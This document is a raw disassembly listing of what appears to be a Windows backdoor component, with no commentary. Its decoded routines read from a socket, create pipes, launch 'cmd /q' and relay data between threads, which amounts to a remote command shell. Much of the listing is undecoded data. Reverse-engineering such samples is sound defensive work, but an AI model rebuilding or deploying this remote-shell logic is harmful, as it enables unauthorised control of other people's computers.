loc_413641: ; CODE XREF: seg000:00413628�j
push esi
lea eax, [ebp-12D0h]
push ebx
push eax
call sub_41E5F0
add esp, 0Ch
push ebx
push esi
lea eax, [ebp-12D0h]
push eax
push dword ptr [edi]
call ds:dword_444064 ; recv
cmp eax, ebx
jg short loc_41362A
jmp loc_4135E8
; ---------------------------------------------------------------------------
dword_41366C dd 246C8D55h, 50EC818Ch, 8B000003h, 57567C45h, 8B594A6Ah
; DATA XREF: sub_40274D+5E41�o
dd 8D106AF0h, 0FFFF24BDh, 5FA5F3FFh, 2080C757h, 1000001h
dd 33000000h, 60458DF6h, 4DE85056h, 830000AFh, 75FF0CC4h
dd 45C76630h, 0FF000260h, 44426015h, 6A066A00h, 66026A01h
dd 89624589h, 7D896475h, 15FF70h, 83004441h, 4589FFF8h
dd 2840F7Ch, 8B000001h, 0C969344Dh, 234h, 168016Ah, 56000004h
dd 0F4818950h, 0FF004444h, 44419415h, 458D5700h, 75FF5060h
dd 0E415FF7Ch, 85004441h, 0CE850FC0h, 6A000000h, 7C75FF0Ah
dd 423015FFh, 0C0850044h, 0BB850Fh, 458D0000h, 458D5070h
dd 75FF504Ch, 0BC15FF7Ch, 8B004440h, 0FFFF83F8h, 75FFE874h
dd 45B70F34h, 75FF504Eh, 28BD8950h, 89FFFFFFh, 15FF4475h
dd 444188h, 24858D50h, 68FFFFFDh, 434A28h, 0AF44E850h
dd 8D570000h, 0FFFD2485h, 50186AFFh, 0FF7714E8h, 344D8BFFh
dd 69384589h, 234C0h, 20C48300h, 44EC8889h, 458D0044h
dd 8D56505Ch, 0FFFF2485h, 836850FFh, 56004134h, 3C15FF56h
dd 8B0042B0h, 0C969384Dh, 234h, 8189C63Bh, 4444FCh, 15FF1D75h
dd 42B01Ch, 49EC6850h, 21E80043h, 59000046h, 6A15EB59h
dd 1415FF32h, 390042B0h, 0F3744475h, 0FFFF45E9h, 7C7D8BFFh
dd 1815FF57h, 0FF004442h, 15FF7C75h, 444218h, 0E83475FFh
dd 0FFFF7955h, 15FF5659h, 42B068h
db 0CCh
; ---------------------------------------------------------------------------
push ebp
mov ebp, esp
push ecx
push esi
mov esi, eax
loc_413804: ; CODE XREF: seg000:00413827�j
push 0
push 1
lea eax, [ebp-1]
push eax
push dword ptr [ebp+8]
call ds:dword_444064 ; recv
cmp eax, 1
jnz short loc_41383A
mov al, [ebp-1]
mov [esi], al
inc esi
dec dword ptr [ebp+0Ch]
jz short loc_41382F
test al, al
jnz short loc_413804
xor eax, eax
inc eax
loc_41382C: ; CODE XREF: seg000:0041383C�j
pop esi
leave
retn
; ---------------------------------------------------------------------------
loc_41382F: ; CODE XREF: seg000:00413823�j
push offset dword_434A70
call sub_417DE4
pop ecx
loc_41383A: ; CODE XREF: seg000:00413818�j
xor eax, eax
jmp short loc_41382C
; ---------------------------------------------------------------------------
dw 0C033h
dd 4244439h, 0C3C0940Fh, 246C8D55h, 0D4EC818Ch, 8B000003h
dd 56537C45h, 59786A57h, 0BD8DF08Bh, 0FFFFFCA0h, 0B58BA5F3h
dd 0FFFFFE6Ch, 697C7589h, 234F6h, 43DB3300h, 1DC9889h
dd 868B0000h, 4444F4h, 0FE848589h, 0FF33FFFFh, 5068458Dh
dd 858D5757h, 0FFFFFE80h, 45C75750h, 1E68h, 6C7D8900h
dd 0FE809D89h, 15FFFFFFh, 4441B0h, 1A75C085h, 44F4B6FFh
dd 15FF0044h, 444218h, 0E87C75FFh, 0FFFF7881h, 17BE959h
dd 53570000h, 5038458Dh, 44F4B6FFh, 15FF0044h, 444064h
dd 0B6FF106Ah, 4444F4h, 0E858458Dh, 0FFFFFF0Dh, 0B6FF106Ah
dd 4444F4h, 0E828458Dh, 0FFFFFEFDh, 0B6FF406Ah, 4444F4h
dd 0E884458Dh, 0FFFFFEEDh, 8D18C483h, 8D507045h, 0FF504845h
dd 4444F4B6h, 7045C700h, 10h, 414815FFh, 0C0850044h, 15FF2174h
dd 4441C4h, 4B686850h, 0A1E80043h, 0FF000044h, 0FEE87C75h
dd 83FFFF77h, 0F6E90CC4h, 6A000000h, 8D046A02h, 0FF504C45h
dd 4441FC15h, 75C73B00h, 4C75FF15h, 418815FFh, 8D500044h
dd 0E850C445h, 0AD2Eh, 30FF0BEBh, 50C4458Dh, 0B53BE8h
dd 57595900h, 0B6336853h, 0B6FF0042h, 4444F4h, 41A015FFh
dd 3D390044h, 4D5268h, 458D4A75h, 858D5058h, 0FFFFFD24h
dd 0AFDEE850h, 0C0850000h, 34745959h, 50C4458Dh, 5058458Dh
dd 434A9C68h, 441AE800h, 0C4830000h, 136A570Ch, 434B5468h
dd 0F4B6FF00h, 0FF004444h, 4441A015h, 0F4B6FF00h, 0E9004444h
dd 0FFFFFECEh, 50C4458Dh, 5058458Dh, 434B2C68h, 43E6E800h
dd 75FF0000h, 650E87Ch, 0C4830000h, 75C08510h, 1C15FF1Fh
dd 500042B0h, 434B0068h, 43C6E800h, 75FF0000h, 7723E87Ch
dd 0C483FFFFh, 1EEB530Ch, 50C4458Dh, 5058458Dh, 434AD468h
dd 43A6E800h, 75FF0000h, 7703E87Ch, 0C483FFFFh, 15FF5710h
dd 42B068h
db 0CCh
byte_413A51 db 55h, 8Dh, 6Ch ; DATA XREF: sub_40274D+219E�o
dd 0EC818C24h, 5A8h, 537C458Bh, 786A5756h, 8DF08B59h, 0FFFE5CBDh
dd 33A5F3FFh, 0B08946F6h, 1DCh, 0FACC858Dh, 6850FFFFh
dd 202h, 411015FFh, 0FF330044h, 1C74C73Bh, 4CCC6850h, 49E80043h
dd 0FF000043h, 0A6E82475h, 83FFFF76h, 0E9560CC4h, 221h
dd 383E6856h, 15FF0041h, 42B0C8h, 2475C085h, 0B01C15FFh
dd 68500042h, 434C88h, 4317E8h, 0FF595900h, 44422415h
dd 2475FF00h, 0FF766CE8h, 0C6EB59FFh, 535B106Ah, 5750458Dh
dd 0AB02E850h, 0C4830000h, 2075FF0Ch, 5045C766h, 15FF0002h
dd 444260h, 6A56066Ah, 45896602h, 547D8952h, 410015FFh
dd 0F8830044h, 7C4589FFh, 13F840Fh, 4D8B0000h, 34C96924h
dd 89000002h, 4444F481h, 4D8D5300h, 0FF505150h, 4441E415h
dd 0FC08500h, 11C85h, 0FFFF6800h, 75FF7FFFh, 3015FF7Ch
dd 85004442h, 6850FC0h, 68000001h, 434C4Ch, 0C6045C7h
dd 89000000h, 7D89647Dh, 4202E868h, 89590000h, 0C5E96C75h
dd 0FF000000h, 458D6C75h, 86A506Ch, 0FFFF68h, 15FF5600h
dd 444120h, 0FFFF883h, 0A784h, 2475FF00h, 4245B70Fh, 4475FF50h
dd 0FF387D89h, 44418815h, 858D5000h, 0FFFFFC5Ch, 434C0868h
dd 0EBE85000h, 8D0000AAh, 0FFFC5C85h, 0A9E850FFh, 56000041h
dd 0FC5C858Dh, 96AFFFFh, 72AFE850h, 4D8BFFFFh, 28458924h
dd 234C069h, 0C4830000h, 0EC888924h, 8D004444h, 57503C45h
dd 0FE5C858Dh, 6850FFFFh, 413848h, 60458D57h, 3C15FF50h
dd 8B0042B0h, 0C969284Dh, 234h, 8189C73Bh, 4444FCh, 15FF1D75h
dd 42B01Ch, 4BCC6850h, 0B9E80043h, 59000041h, 6A31EB59h
dd 1415FF32h, 390042B0h, 0F374387Dh, 5070458Dh, 5040458Dh
dd 897C75FFh, 15FF705Dh, 4440BCh, 0FE83F08Bh, 1C850FFFh
dd 0EBFFFFFFh, 7C758B03h, 41C415FFh, 8D500044h, 0FFFC5C85h
dd 4B9468FFh, 0E8500043h, 0AA2Eh, 390CC483h, 2075347Dh
dd 3075FF57h, 0FC5C858Dh, 8D50FFFFh, 0FFFE6085h, 0B5FF50FFh
dd 0FFFFFE5Ch, 0FED59EE8h, 14C483FFh, 0FC5C858Dh, 0E850FFFFh
dd 40C4h, 15FF5659h, 444218h, 0FF7C75FFh, 44421815h, 2415FF00h
dd 0FF004442h, 7EE82475h, 59FFFF74h, 6815FF57h, 0CC0042B0h
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_413CD4 proc near ; CODE XREF: sub_413F5A+98�p
var_58 = dword ptr -58h
var_54 = dword ptr -54h
var_50 = dword ptr -50h
var_4C = dword ptr -4Ch
var_48 = dword ptr -48h
var_44 = dword ptr -44h
var_40 = dword ptr -40h
var_3C = dword ptr -3Ch
var_2C = dword ptr -2Ch
var_28 = word ptr -28h
var_26 = word ptr -26h
var_24 = dword ptr -24h
var_20 = dword ptr -20h
var_1C = dword ptr -1Ch
var_18 = byte ptr -18h
var_14 = dword ptr -14h
var_10 = dword ptr -10h
var_C = dword ptr -0Ch
var_4 = dword ptr -4
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
push ebp
mov ebp, esp
sub esp, 58h
push esi
push edi
push 44h
pop edi
xor esi, esi
push edi
lea eax, [ebp+var_58]
push esi
push eax
mov [ebp+var_4], esi
call sub_41E5F0
push 10h
lea eax, [ebp+var_14]
push esi
push eax
call sub_41E5F0
mov eax, [ebp+arg_0]
add esp, 18h
push esi
push 1
mov [ebp+var_20], eax
push 2
lea eax, [ebp+var_18]
mov [ebp+var_58], edi
mov edi, ds:dword_42B09C
push eax
mov [ebp+var_54], esi
mov [ebp+var_4C], esi
mov [ebp+var_50], esi
mov [ebp+var_3C], esi
mov [ebp+var_40], esi
mov [ebp+var_44], esi
mov [ebp+var_48], esi
mov [ebp+var_28], si
mov [ebp+var_24], esi
mov [ebp+var_26], si
mov [ebp+var_2C], 101h
mov [ebp+var_1C], ebx
call edi ; GetCurrentProcess
push eax
push ebx
call edi ; GetCurrentProcess
push eax
call ds:dword_42B098 ; DuplicateHandle
lea eax, [ebp+var_14]
push eax
lea eax, [ebp+var_58]
push eax
push esi
push esi
push esi
push 1
push esi
push esi
push offset aCmdQ ; "cmd /q"
push esi
call ds:dword_42B008 ; CreateProcessA
test eax, eax
jz short loc_413D8C
mov eax, [ebp+arg_4]
mov ecx, [ebp+var_C]
imul eax, 234h
push [ebp+var_10]
mov esi, [ebp+var_14]
mov ds:dword_4444F0[eax], ecx
call ds:dword_42B004 ; CloseHandle
jmp short loc_413DA2
; ---------------------------------------------------------------------------
loc_413D8C: ; CODE XREF: sub_413CD4+96�j
call ds:dword_42B01C ; RtlGetLastWin32Error
push eax
push offset unk_434CF8
call sub_417DE4
mov esi, [ebp+var_4]
pop ecx
pop ecx
loc_413DA2: ; CODE XREF: sub_413CD4+B6�j
pop edi
mov eax, esi
pop esi
leave
retn
sub_413CD4 endp
; ---------------------------------------------------------------------------
dword_413DA8 dd 246C8D55h, 0B0EC818Ch, 53000001h, 0B0801D8Bh, 57560042h
; DATA XREF: seg000:00414095�o
dd 0EB7C7D8Bh, 32C03349h, 39F633D2h, 27767C45h, 0AC354C8Ah
dd 750AF980h, 0DFA800Eh, 84C60974h, 0FFFEC405h, 88400DFFh
dd 0FEC4058Ch, 4640FFFFh, 8A7C753Bh, 6AD972D1h, 858D5000h
dd 0FFFFFEC4h, 0C77FF50h, 41A015FFh, 0C0850044h, 6A177Eh
dd 507C458Dh, 0C868h, 0AC458D00h, 0FF37FF50h, 75C085D3h
dd 1C358BA0h, 0FF0042B0h, 6DF883D6h, 0D6FF0F74h, 4D386850h
dd 0A9E80043h, 5900003Fh, 5B5E5F59h, 0C974C583h
db 0C3h
aUnlMb_1 db 'Ul$ŒìÜ',0 ; DATA XREF: seg000:004140CB�o
align 10h
dd 0DB335653h, 7C7D8B57h, 5D89F633h, 0D5E964h, 5D390000h
dd 0FF087664h, 0CBE9644Dh, 8A000000h, 0BE0F7F45h, 0FFF981C8h
dd 0F000000h, 0A184h, 89083C00h, 5174685Dh, 4D747F3Ch
dd 0A75033Ch, 15FF5353h, 42B0CCh, 153C66EBh, 0F6331E75h
dd 206C45C6h, 586D45C6h, 586E45C6h, 586F45C6h, 0D7045C6h
dd 0A7145C6h, 30EB066Ah, 4488C933h, 41469835h, 45880D3Ch
dd 0C622756Ch, 0A983544h, 0A6D45C6h, 0EB026A46h, 76F33B13h
dd 45C64E26h, 45C6086Ch, 45C6206Dh, 36A086Eh, 8D515359h
dd 0FF506C45h, 15FF0C77h, 4441A0h, 527EC085h, 3C7F458Ah
dd 5333750Dh, 5060458Dh, 98458D56h, 477FF50h, 0B08415FFh
dd 0C0850042h, 0F6333474h, 5D3918EBh, 0C7097568h, 16845h
dd 0AEB0000h, 0A6445C7h, 89000000h, 6A53685Dh, 7F458D01h
dd 0C77FF50h, 406415FFh, 0C0850044h, 0FF108F0Fh, 5E5FFFFFh
dd 74C5835Bh
db 0C9h, 0C3h
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_413F5A proc near ; CODE XREF: seg000:00414063�p
var_14 = dword ptr -14h
var_10 = dword ptr -10h
var_C = dword ptr -0Ch
var_8 = dword ptr -8
var_4 = dword ptr -4
arg_0 = dword ptr 8
push ebp
mov ebp, esp
sub esp, 14h
push esi
push edi
xor edi, edi
push 18h
mov [ebp+var_4], edi
mov [ebp+var_8], edi
call sub_41E5D3
mov esi, eax
cmp esi, edi
pop ecx
jnz short loc_413F7F
xor eax, eax
jmp loc_414052
; ---------------------------------------------------------------------------
loc_413F7F: ; CODE XREF: sub_413F5A+1C�j
push ebx
push edi
lea eax, [ebp+var_14]
push eax
lea eax, [ebp+var_8]
mov [esi], edi
push eax
lea ebx, [esi+4]
mov [ebx], edi
push esi
mov [ebp+var_14], 0Ch
mov [ebp+var_10], edi
mov [ebp+var_C], 1
call ds:dword_42B0A0 ; CreatePipe
test eax, eax
mov edi, ds:dword_42B004
jnz short loc_413FC0
call ds:dword_42B01C ; RtlGetLastWin32Error
push eax
push offset unk_434DE0
jmp short loc_413FE1
; ---------------------------------------------------------------------------
loc_413FC0: ; CODE XREF: sub_413F5A+56�j
push 0
lea eax, [ebp+var_14]
push eax
push ebx
lea eax, [ebp+var_4]
push eax
call ds:dword_42B0A0 ; CreatePipe
test eax, eax
jnz short loc_413FE9
call ds:dword_42B01C ; RtlGetLastWin32Error
push eax
push offset unk_434D9C
loc_413FE1: ; CODE XREF: sub_413F5A+64�j
call sub_417DE4
pop ecx
jmp short loc_414016
; ---------------------------------------------------------------------------
loc_413FE9: ; CODE XREF: sub_413F5A+79�j
push [ebp+arg_0]
mov ebx, [ebp+var_8]
push [ebp+var_4]
call sub_413CD4
pop ecx
pop ecx
mov [esi+8], eax
push [ebp+var_4]
call edi ; CloseHandle
push [ebp+var_8]
call edi ; CloseHandle
cmp dword ptr [esi+8], 0
jnz short loc_41404B
push offset unk_434D74
call sub_417D70
loc_414016: ; CODE XREF: sub_413F5A+8D�j
cmp [ebp+var_4], 0
pop ecx
jz short loc_414022
push [ebp+var_4]
call edi ; CloseHandle
loc_414022: ; CODE XREF: sub_413F5A+C1�j
cmp [ebp+var_8], 0
jz short loc_41402D
push [ebp+var_8]
call edi ; CloseHandle
loc_41402D: ; CODE XREF: sub_413F5A+CC�j
mov eax, [esi]
test eax, eax
jz short loc_414036
push eax
call edi ; CloseHandle
loc_414036: ; CODE XREF: sub_413F5A+D7�j
mov eax, [esi+4]
test eax, eax
jz short loc_414040
push eax
call edi ; CloseHandle
loc_414040: ; CODE XREF: sub_413F5A+E1�j
push esi
call sub_41E2A1
pop ecx
xor eax, eax
jmp short loc_414051
; ---------------------------------------------------------------------------
loc_41404B: ; CODE XREF: sub_413F5A+B0�j
or dword ptr [esi+0Ch], 0FFFFFFFFh
mov eax, esi
loc_414051: ; CODE XREF: sub_413F5A+EF�j
pop ebx
loc_414052: ; CODE XREF: sub_413F5A+20�j
pop edi
pop esi
leave
retn
sub_413F5A endp
; ---------------------------------------------------------------------------
push ebp
mov ebp, esp
sub esp, 18h
push ebx
push esi
push edi
mov edi, [ebp+8]
push edi
call sub_413F5A
imul edi, 234h
mov esi, eax
mov eax, ds:dword_4444F4[edi]
mov edi, ds:dword_42B03C
xor ebx, ebx
pop ecx
mov dword ptr [ebp-0Ch], 0Ch
mov [ebp-8], ebx
mov [ebp-4], ebx
mov [esi+0Ch], eax
lea eax, [ebp+8]
push eax
push ebx
push esi
push offset dword_413DA8
push ebx
lea eax, [ebp-0Ch]
push eax
call edi ; CreateThread
cmp eax, ebx
mov [esi+10h], eax
jnz short loc_4140C5
call ds:dword_42B01C ; RtlGetLastWin32Error
push eax
push offset dword_434E58
call sub_417DE4
or dword ptr [esi+0Ch], 0FFFFFFFFh
pop ecx
xor eax, eax
jmp loc_4141A5
; ---------------------------------------------------------------------------
loc_4140C5: ; CODE XREF: seg000:004140A6�j
lea eax, [ebp+8]
push eax
push ebx
push esi
push offset aUnlMb_1 ; "Ul$ŒìÜ"
push ebx
lea eax, [ebp-0Ch]
push eax
call edi ; CreateThread
cmp eax, ebx
mov [esi+14h], eax
jnz short loc_414106
call ds:dword_42B01C ; RtlGetLastWin32Error
push eax
push offset dword_434E58
call sub_417DE4
or dword ptr [esi+0Ch], 0FFFFFFFFh
pop ecx
pop ecx
push ebx
push dword ptr [esi+14h]
call ds:dword_42B028 ; TerminateThread
xor eax, eax
jmp loc_4141A6
; ---------------------------------------------------------------------------
loc_414106: ; CODE XREF: seg000:004140DC�j
mov eax, [esi+10h]
mov [ebp-18h], eax
mov eax, [esi+14h]
mov [ebp-14h], eax
mov eax, [esi+8]
push 0FFFFFFFFh
mov [ebp-10h], eax
push ebx
lea eax, [ebp-18h]
push eax
push 3
call ds:dword_42B0D0 ; WaitForMultipleObjects
sub eax, ebx
jz short loc_414160
dec eax
jz short loc_41415A
dec eax
jz short loc_414146
call ds:dword_42B01C ; RtlGetLastWin32Error
push eax
push offset unk_434E20
call sub_417DE4
pop ecx
pop ecx
jmp short loc_414175
; ---------------------------------------------------------------------------
loc_414146: ; CODE XREF: seg000:0041412F�j
mov edi, ds:dword_42B028
push ebx
push dword ptr [esi+14h]
call edi ; TerminateThread
push ebx
push dword ptr [esi+10h]
call edi ; TerminateThread
jmp short loc_414175
; ---------------------------------------------------------------------------
loc_41415A: ; CODE XREF: seg000:0041412C�j
push ebx
push dword ptr [esi+10h]
jmp short loc_414164
; ---------------------------------------------------------------------------
loc_414160: ; CODE XREF: seg000:00414129�j
push ebx
push dword ptr [esi+14h]
loc_414164: ; CODE XREF: seg000:0041415E�j
call ds:dword_42B028 ; TerminateThread
push 1
push dword ptr [esi+8]
call ds:dword_42B094 ; TerminateProcess
loc_414175: ; CODE XREF: seg000:00414144�j
; seg000:00414158�j
push dword ptr [esi+10h]
mov edi, ds:dword_42B004
call edi ; CloseHandle
push dword ptr [esi+14h]
call edi ; CloseHandle
push dword ptr [esi+8]
call edi ; CloseHandle
push dword ptr [esi]
call edi ; CloseHandle
push dword ptr [esi+4]
call edi ; CloseHandle
push dword ptr [esi+0Ch]
call ds:dword_444218 ; closesocket
push esi
call sub_41E2A1
xor eax, eax
inc eax
loc_4141A5: ; CODE XREF: seg000:004140C0�j
pop ecx
loc_4141A6: ; CODE XREF: seg000:00414101�j
pop edi
pop esi
pop ebx
leave
retn
; ---------------------------------------------------------------------------
db 55h
dd 90246C8Dh, 504EC81h, 8B530000h, 57567C5Dh, 0BEFF33h
dd 33000004h, 9D8941C9h, 0FFFFFF70h, 0FF6C8D89h, 0C033FFFFh
dd 3978558Bh, 0FF708594h, 574FFFFh, 72C13B40h, 75C13BEFh
dd 74958910h, 0C7FFFFFFh, 0FFFF6C85h, 2FFh, 858D5600h
dd 0FFFFFB6Ch, 0E9E85057h, 830000A3h, 57570CC4h, 6C858D57h
dd 50FFFFFFh, 0B015FF57h, 8D004441h, 0FFFF6C85h, 0FF5350FFh
dd 44415C15h, 74C08500h, 8D56572Ch, 0FFFB6C85h, 0FF5350FFh
dd 44406415h, 0FFF88300h, 50575F74h, 0FB6C858Dh, 0FF50FFFFh
dd 15FF7875h, 4441A0h, 74FFF883h, 6C858D48h, 50FFFFFFh
dd 0FF7875FFh, 44415C15h, 0FC08500h, 0FFFF5284h, 8D5657FFh
dd 0FFFB6C85h, 75FF50FFh, 6415FF78h, 83004440h, 1974FFF8h
dd 858D5057h, 0FFFFFB6Ch, 15FF5350h, 4441A0h, 0FFFF883h
dd 0FFFF2285h, 5B5E5FFFh, 0C970C583h, 6C8D55C3h, 0EC818C24h
dd 5D4h, 537C458Bh, 2C6A5756h, 8DF08B59h, 0A5F3AC7Dh, 8948758Bh
dd 0F6697C75h, 234h, 8947FF33h, 0ACB8h, 0F4868B00h, 89004444h
dd 0FFFAA485h, 8DDB33FFh, 53506C45h, 0A0858D53h, 50FFFFFAh
dd 6C45C753h, 5, 89705D89h, 0FFFAA0BDh, 0B015FFFFh, 85004441h
dd 0FF0B75C0h, 4444F4B6h, 9DE900h, 68530000h, 408h, 0FBA4858Dh
dd 0FF50FFFFh, 4444F4B6h, 6415FF00h, 85004440h, 807A7EC0h
dd 0FFFBA4BDh, 717504FFh, 0FBA5BD80h, 7501FFFFh, 305D3868h
dd 458D7F74h, 858D5030h, 0FFFFFBACh, 0A632E850h, 0C0850000h
dd 69745959h, 5030458Dh, 0FBAC858Dh, 6850FFFFh, 434F24h
dd 3A6BE8h, 4006800h, 858D0000h, 0FFFFFBACh, 9D885053h
dd 0FFFFFBA4h, 0FBA585C6h, 0E85DFFFFh, 0A258h, 5318C483h
dd 858D086Ah, 0FFFFFBA4h, 0F4B6FF50h, 0FF004444h, 4441A015h
dd 0F4B6FF00h, 0FF004444h, 44421815h, 7C75FF00h, 0FF6D84E8h
dd 0FF5359FFh, 42B06815h, 8D106A00h, 50535C45h, 0A217E8h
dd 858B6600h, 0FFFFFBA6h, 6A0CC483h, 45896606h, 0A8858B5Eh
dd 57FFFFFBh, 0C766026Ah, 25C45h, 0FF604589h, 44410015h
dd 83F88B00h, 0E75FFFFh, 41C415FFh, 68500044h, 434EE4h
dd 106A1EEBh, 505C458Dh, 0AC15FF57h, 83004440h, 3875FFF8h
dd 41C415FFh, 68500044h, 434EA0h, 39ABE8h, 4006800h, 858D0000h
dd 0FFFFFBACh, 9D885053h, 0FFFFFBA4h, 0FBA585C6h, 0E85BFFFFh
dd 0A198h, 0E914C483h, 0FFFFFF3Bh, 40068h, 0AC858D00h
dd 53FFFFFBh, 0A49D8850h, 0C6FFFFFBh, 0FFFBA585h, 71E85AFFh
dd 830000A1h, 6A530CC4h, 0A4858D08h, 50FFFFFBh, 44F4B6FFh
dd 15FF0044h, 4441A0h, 44F4B6FFh, 0E8570044h, 0FFFFFD07h
dd 0FF575959h, 44421815h, 0FEFFE900h
db 2 dup(0FFh)
word_4144B2 dw 8D55h ; DATA XREF: sub_40274D+29F6�o
dd 818C246Ch, 2D4ECh, 7C458B00h, 6A575653h, 2C6A5B10h
dd 8DF08B59h, 0A5F3A07Dh, 5347FF33h, 0A8B889h, 0F6330000h
dd 5660458Dh, 705D8950h, 0A107E8h, 0CC48300h, 663475FFh
dd 26045C7h, 6015FF00h, 6A004442h, 26A5706h, 62458966h
dd 0FF647589h, 44410015h, 8BF88B00h, 0C0693845h, 234h
dd 44F4B889h, 8D530044h, 57506045h, 41E415FFh, 0C0850044h
dd 114850Fh, 0A6A0000h, 3015FF57h, 85004442h, 3850FC0h
dd 0FF000001h, 75FF3475h, 0DE7BE8A0h, 5059FFFEh, 0FDA0858Dh
dd 8068FFFFh, 500042EBh, 0A145E8h, 10C48300h, 75447539h
dd 75FF561Ah, 0A0858D40h, 50FFFFFDh, 50A4458Dh, 0E8A075FFh
dd 0FFFECCBBh, 8D14C483h, 0FFFDA085h, 0E1E850FFh, 59000037h
dd 5070458Dh, 5050458Dh, 0BC15FF57h, 0FF004440h, 0D88B3875h
dd 5245B70Fh, 5475FF50h, 0FF4C7589h, 44418815h, 858D5000h
dd 0FFFFFDA0h, 434FD868h, 0DFE85000h, 530000A0h, 0FDA0858Dh
dd 196AFFFFh, 68AFE850h, 4D8BFFFFh, 3C458938h, 234C069h
dd 0C4830000h, 0EC888920h, 8D004444h, 56507C45h, 50A0458Dh
dd 4142A968h, 0FF565600h, 42B03C15h, 3C4D8B00h, 234C969h
dd 0C63B0000h, 44FC8189h, 28750044h, 0B01C15FFh, 8D500042h
dd 0FFFDA085h, 4F9868FFh, 0E8500043h, 0A07Ah, 0E90CC483h
dd 0FFFFFF4Fh, 15FF056Ah, 42B014h, 744C7539h, 0FF3DE9F3h
dd 0FF57FFFFh, 44421815h, 3475FF00h, 0FDA0858Dh, 6468FFFFh
dd 5000434Fh, 0A045E8h, 0CC48300h, 75447539h, 75FF561Ah
dd 0A0858D40h, 50FFFFFDh, 50A4458Dh, 0E8A075FFh, 0FFFECBBBh
dd 8D14C483h, 0FFFDA085h, 0E1E850FFh, 0FF000036h, 0B2E83875h
dd 59FFFF6Ah, 15FF5659h, 42B068h
db 0CCh
aUnlMb db 'Ul$Œì|',8,0 ; DATA XREF: sub_40274D+1F07�o
; seg000:0040B793�o
align 4
dd 537C558Bh, 0DB335756h, 40C03353h, 26AF28Bh, 0A9B9h
dd 0BD8D00h, 0F3FFFFFDh, 1085FFA5h, 6AFFFFFFh, 64458902h
dd 89604589h, 82896C45h, 2A0h, 410015FFh, 0F08B0044h, 75FFFE83h
dd 1906868h, 15FF0000h, 42B014h, 41C415FFh, 8D500044h
dd 0FFF8FC85h, 509868FFh, 0E8500043h, 9F96h, 390CC483h
dd 20759C5Dh, 9875FF53h, 0F8FC858Dh, 8D50FFFFh, 0FFFF1885h
dd 0B5FF50FFh, 0FFFFFD00h, 0FECB06E8h, 14C483FFh, 0F8FC858Dh
dd 0E850FFFFh, 362Ch, 0FF0CB5FFh, 0FAE8FFFFh, 59FFFF69h
dd 3A4E9h, 8D046A00h, 6A506445h, 0FFFFBF04h, 56570000h
dd 412015FFh, 46A0044h, 5060458Dh, 5657FB6Ah, 412015FFh
dd 858B0044h, 0FFFFFF0Ch, 234C069h, 106A0000h, 44F4B089h
dd 458D0044h, 0E8505348h, 9E58h, 0FF0CC483h, 0FFFF14B5h
dd 45C766FFh, 0FF000248h, 44426015h, 45896600h, 8D106A4Ah
dd 56504845h, 0FF4C5D89h, 4441E415h, 0FFF88300h, 88681975h
dd 0FF000013h, 42B01415h, 108DFF00h, 0FFFFFFFFh, 2EE97C75h
dd 8D000003h, 0FFFD0485h, 0B63068FFh, 0E8500042h, 9D5Eh
dd 5959C33Bh, 75704589h, 190685Fh, 15FF0000h, 42B014h
dd 0FD04858Dh, 8D50FFFFh, 0FFF8FC85h, 507068FFh, 0E8500043h
dd 9E8Ah, 9875FF53h, 0F8FC858Dh, 8D50FFFFh, 0FFFF1885h
dd 0B5FF50FFh, 0FFFFFD00h, 0FECA02E8h, 0FC858DFFh, 50FFFFF8h
dd 352BE8h, 0CB5FF00h, 0E8FFFFFFh, 0FFFF68F9h, 0E928C483h
dd 2A2h, 397C7D8Bh, 2A09Fh, 69840F00h, 0BF000002h, 80h
dd 0A4458D57h, 45C75053h, 558h, 5C45C700h, 1388h, 0F7FCB589h
dd 85C7FFFFh, 0FFFFF7F8h, 1, 9D5BE8h, 0CC48300h, 5058458Dh
dd 858D5353h, 0FFFFF7F8h, 15FF5350h, 4441B0h, 8E0FC085h
dd 210h, 0CF8BC033h, 0FAFC9D88h, 0BD8DFFFFh, 0FFFFFAFDh
dd 0AB66ABF3h, 68458DAAh, 38458D50h, 80685350h, 8D000000h
dd 5650A445h, 106845C7h, 0FF000000h, 44408815h, 3C75FF00h
dd 0FF6C4589h, 44418815h, 458D5000h, 0A7E85024h, 3800009Dh
dd 5959A45Dh, 1A4850Fh, 7D800000h, 850F01A5h, 0B5h, 0FE08858Dh
dd 0E850FFFFh, 98A0h, 75FF5353h, 0BD8FE870h, 75FF0000h
dd 858D70h, 68FFFFFBh, 200h, 8850016Ah, 0FFFAFC9Dh, 0FD85C6FFh
dd 3FFFFFAh, 0FAFE9D88h, 85C6FFFFh, 0FFFFFAFFh, 997FE801h
dd 0C4830000h, 6875FF20h, 51384D8Dh, 536C4589h, 5004C083h
dd 0FAFC858Dh, 5650FFFFh, 40CC15FFh, 458D0044h, 858D5024h
dd 0FFFFF8FCh, 43504868h, 17E85000h, 8300009Dh, 5D390CC4h
dd 5320759Ch, 8D9875FFh, 0FFF8FC85h, 858D50FFh, 0FFFFFF18h
dd 0B5FF50h, 0E8FFFFFDh, 0FFFEC887h, 8D14C483h, 0FFF8FC85h
dd 0ADE850FFh, 59000033h, 0FBE9h, 0A57D8000h, 0DB850F04h
dd 8A000000h, 0F980A74Dh, 0A6458AFFh, 0FAFC9D88h, 85C6FFFFh
dd 0FFFFFAFDh, 0FE0C7503h, 88C932C0h, 0FFFAFF9Dh, 0FE08EBFFh
dd 0FF8D88C1h, 88FFFFFAh, 0FFFAFE85h, 0C0B60FFFh, 0F08E0C1h
dd 0C103C9B6h, 0BF09E0C1h, 200h, 50C72B53h, 0E87075FFh
dd 0BC95h, 8D7075FFh, 0FFFB0085h, 16A57FFh, 98A3E850h
dd 0C4830000h, 6875FF1Ch, 458DF88Bh, 8D535038h, 8D500447h
dd 0FFFAFC85h, 895650FFh, 15FF6C7Dh, 4440CCh, 6875FB3Bh
dd 5024458Dh, 0F8FC858Dh, 2868FFFFh, 50004350h, 9C35E8h
dd 0CC48300h, 759C5D39h, 75FF5320h, 0FC858D98h, 50FFFFF8h
dd 0FF18858Dh, 0FF50FFFFh, 0FFFD00B5h, 0C7A5E8FFh, 0C483FFFEh
dd 0FC858D14h, 50FFFFF8h, 32CBE8h, 805FF00h, 59004D40h
dd 75FF16EBh, 38458D68h, 96A5350h, 43501C68h, 15FF5600h
dd 4440CCh, 0F6C5D39h, 0FFFD8B8Fh, 7C7D8BFFh, 1815FF56h
dd 0FF004442h, 6CE87075h, 0FF000097h, 0FFFF108Dh, 0A09F39FFh
